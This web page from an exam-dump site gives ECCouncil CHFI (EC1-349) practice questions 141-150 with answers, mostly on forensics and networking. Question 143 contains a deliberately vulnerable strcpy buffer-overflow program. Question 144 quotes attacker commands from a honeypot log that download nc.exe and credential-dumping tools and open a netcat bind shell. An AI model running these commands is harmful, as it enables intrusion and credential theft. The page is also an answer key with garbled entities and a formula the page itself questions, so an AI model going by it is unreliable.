[Free] 2018(Jan) EnsurePass Dumpsleader ECCouncil EC1-349 Dumps with VCE and PDF 141-150

Ensurepass.com : Ensure you pass the IT Exams
2018 Jan ECCouncil Official New Released EC1-349
100% Free Download! 100% Pass Guaranteed!

ECCouncil Computer Hacking Forensic Investigator

Question No: 141 – (Topic 2)

You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls (Select 2)

A. 161

B. 162

C. 163

D. 160

Answer: A,B

Question No: 142 – (Topic 2)

Law enforcement officers are conducting a legal search for which a valid warrant was obtained. While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the term used to describe how this evidence is admissible?

  1. Plain view doctrine

  2. Corpus delicti

  3. Locard Exchange Principle

  4. Ex Parte Order

Answer: A

Question No: 143 – (Topic 2)

Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point? #include #include int main(int argc, char *argv[]) { char buffer[10]; if (argc lt; 2) { fprintf (stderr, quot;USAGE: %s string\nquot;, argv[0]); return 1; } strcpy(buffer, argv[1]); return 0; }

  1. SQL injection

  2. Format string bug

  3. Buffer overflow

  4. Kernal injection

Answer: C

Question No: 144 – (Topic 2)

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from The File

Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

quot;cmd1.exe /c open gt;ftpcomquot; quot;cmd1.exe /c echo johna2k gt;gt;ftpcomquot; quot;cmd1.exe /c echo haxedj00 gt;gt;ftpcomquot; quot;cmd1.exe /c echo get nc.exe gt;gt;ftpcomquot; quot;cmd1.exe /c echo get pdump.exe gt;gt;ftpcomquot; quot;cmd1.exe /c echo get samdump.dll gt;gt;ftpcomquot; quot;cmd1.exe /c echo quit gt;gt;ftpcomquot;

quot;cmd1.exe /c ftp -s:ftpcomquot;

quot;cmd1.exe /c nc -l -p 6969 -e cmd1.exequot;

What can you infer from the exploit given?

  1. It is a local exploit where the attacker logs in using username johna2k

  2. There are two attackers on the system – johna2k and haxedj00

  3. The attack is a remote exploit and the hacker downloads three files

  4. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer: C

Explanation: Explanation: The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

Question No: 145 – (Topic 2)

To calculate the number of bytes on a disk, the formula is: CHS**

  1. number of circles x number of halves x number of sides x 512 bytes per sector

  2. number of cylinders x number of halves x number of shims x 512 bytes per sector

  3. number of cells x number of heads x number of sides x 512 bytes per sector

  4. number of cylinders x number of heads x number of sides x 512 bytes per sector

Answer: D

Explanation: Although D in this question is probably the closest, the answer may have been transcribed incorrectly. CHS stands for Cylinder Head Sector, and S is not sides. Each side of a platter of a disk has its own head.

A cylinder is an alignment of all tracks under one head position. So the answer is number of cylinders x number of heads x number of sectors (per track) x 512 bytes per sector (assuming that is the sector size as some disks may have larger sector sizes). The number of tracks per side of disk, or the number of tracks that a single head can access is equal to the number of cylinders.

Question No: 146 – (Topic 2)

Where is the startup configuration located on a router?

  1. Static RAM

  2. BootROM

  3. NVRAM

  4. Dynamic RAM

Answer: C

Question No: 147 – (Topic 2)

Why would a company issue a dongle with the software they sell?

  1. To provide source code protection

  2. To provide wireless functionality with the software

  3. To provide copyright protection

  4. To ensure that keyloggers cannot be used

Answer: C

Question No: 148 – (Topic 2)

When operating systems mark a cluster as used but not allocated, the cluster is considered as

  1. Corrupt

  2. Bad

  3. Lost

  4. Unallocated

Answer: C

Question No: 149 – (Topic 2)

What will the following command accomplish in Linux? fdisk /dev/hda

  1. Partition the hard drive

  2. Format the hard drive

  3. Delete all files under the /dev/hda folder

  4. Fill the disk with zeros

Answer: A

Question No: 150 – (Topic 2)

When investigating a wireless attack, what information can be obtained from the DHCP logs?

  1. The operating system of the attacker and victim computersThe operating system of the attacker and victim? computers

  2. IP traffic between the attacker and the victim

  3. MAC address of the attacker

If any computers on the network are running in promiscuous mode

Answer: C

100% Ensurepass Free Download!
Download Free Demo:EC1-349 Demo PDF
100% Ensurepass Free Guaranteed!
EC1-349 Dumps

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.